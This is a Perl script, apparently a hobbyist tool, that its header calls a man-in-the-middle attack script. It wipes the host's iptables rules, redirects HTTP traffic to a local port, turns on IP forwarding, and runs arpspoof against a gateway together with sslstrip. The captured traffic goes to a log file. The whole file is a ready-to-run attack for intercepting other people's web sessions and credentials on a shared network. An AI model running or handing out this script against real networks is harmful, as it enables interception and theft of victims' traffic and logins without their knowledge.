#!usr/bin/perl use Term::ANSIColor; ############################################################################ print "**************************************************************\n"; # print "+ -== JULI ==- +\n"; # print "+ -== Man-in-the-middle Attack Script ==- +\n"; # print "+ -== By em616 , em(at)em616.com , http://blog.em616.com ==- +\n"; # print "**************************************************************\n"; # ############################################################################ # Cleaning stuff system "killall -9 sslstrip arpspoof:"; system "echo '0' > /proc/sys/net/ipv4/ip_forward"; system "iptables --table nat --flush"; system "iptables --flush"; system "iptables --delete-chain"; system "iptables --table nat --delete-chain"; #Making a Firewall, setting iptables roule to redirect port 80 to 5254 print color("bold red"), "Setting up the iptables roulle\n", color("reset"); print color("bold red"), ". . ..\n", color("reset"); system "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5254"; #Port Fawarding print color("bold red"), "Setting up port fawarding on our box\n", color("reset"); system "echo '1' > /proc/sys/net/ipv4/ip_forward"; ## Arpspoof Script, must specify your interface and router IP if ($#ARGV < 0) { print q{ Enter your interface and router ip, Ex: en@em616:~$ perl juli.pl wlan0 }; exit; } elsif ($#ARGV < 1) { print "You have not provided all of the arguments required\n"; print color("bold green"), "perl juli.pl wlan0\n", color("reset"); exit; } $interface = $ARGV[0]; $getway = $ARGV[1]; print color("bold red"), "Starting arpsoof on interface: $interface ip: $getway \n", color("reset"); system "arpspoof -i $interface $getway & sslstrip -a -k -l 5254 -w Juliscript.log"; print "Script stoped by you , check Juliscript.log if we found anything \n" # LineAL ;)